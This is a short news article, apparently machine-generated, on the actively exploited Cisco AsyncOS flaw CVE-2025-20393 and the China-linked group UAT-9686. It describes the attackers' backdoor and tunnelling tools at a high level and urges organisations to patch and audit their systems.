Ethical Hacking News
A critical flaw has been discovered in Cisco AsyncOS software, exposing vulnerable devices to exploitation by China-linked APT group UAT-9686. The vulnerability affects the Spam Quarantine feature of Secure Email Gateway and Secure Email and Web Manager appliances, allowing attackers to execute arbitrary commands with root privileges. Organizations must take immediate action to secure their devices and prevent similar attacks.
The Cisco AsyncOS software used by Secure Email Gateway and Secure Email and Web Manager appliances has a critical flaw (CVE-2025-20393) that allows attackers to execute arbitrary commands with root privileges. The vulnerability is primarily aimed at exposing email appliances running non-standard configurations, suggesting organizations must secure their devices to prevent similar attacks. A China-linked APT group, UAT-9686, is responsible for the attack campaign using custom tools like AquaShell and chisel to maintain stealth and long-term access to compromised systems. The attack highlights the importance of regular security audits and vulnerability assessments, as well as implementing robust security measures such as encryption and multi-factor authentication.
Pierluigi Paganini, a renowned security expert and author of Security Affairs, has been tracking a series of cyberattacks that have targeted various organizations worldwide. The latest attack, which was discovered by Cisco's Talos security experts, has revealed a critical flaw in the AsyncOS software used by Secure Email Gateway and Secure Email and Web Manager appliances.
The vulnerability, tracked as CVE-2025-20393 (CVSS score of 10.0), affects the Spam Quarantine feature of these devices, allowing attackers to execute arbitrary commands on the underlying operating system with root privileges. This means that once an attacker gains access to a vulnerable device, they can install persistence, establish persistent reverse SSH access, and execute encoded shell commands sent via unauthenticated HTTP POST requests.
The attack vector is primarily aimed at exposing Cisco AsyncOS email appliances running non-standard configurations, as outlined in Cisco's advisory. Analysis shows that misconfigurations play a key role in the exposure, suggesting that organizations must take extra precautions to secure their devices and prevent similar attacks in the future.
In December 2025, U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the zero-day flaw to its Known Exploited Vulnerabilities catalog, highlighting the severity of the issue. Cisco has since fixed the vulnerability by releasing patches for affected releases, including Cisco Email Security Gateway and Secure Email and Web Manager appliances.
The attack campaign was launched by a China-linked APT group known as UAT-9686, which is also responsible for other notable attacks in recent months. The attackers employed custom tools, including AquaShell (a Python-based backdoor), AquaTunnel (reverse SSH tunnel), chisel (tunneling tool), and AquaPurge (log-clearing utility) to maintain stealth and long-term access to compromised systems.
The fact that the attack was successful due to improper HTTP request validation in the Spam Quarantine feature highlights the importance of regular security audits and vulnerability assessments for organizations that use Cisco AsyncOS software. It also underscores the need for organizations to implement robust security measures, such as encryption, secure protocols, and multi-factor authentication, to prevent similar attacks.
In conclusion, the discovery of this critical flaw in Cisco AsyncOS software has significant implications for organizations worldwide. The fact that only appliances running non-standard configurations have been compromised suggests that misconfigurations play a key role in exposure. As a result, it is essential for organizations to take proactive steps to secure their devices and prevent similar attacks in the future.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Critical-Flaw-in-Cisco-AsyncOS-Software-Exposes-Vulnerability-to-China-Linked-APT-Group-UAT-9686-ehn.shtml
https://securityaffairs.com/186985/apt/china-linked-apt-uat-9686-abused-now-patched-maximum-severity-asyncos-bug.html
https://nvd.nist.gov/vuln/detail/CVE-2025-20393
https://www.cvedetails.com/cve/CVE-2025-20393/
Published: Fri Jan 16 05:20:42 2026 by llama3.2 3B Q4_K_M
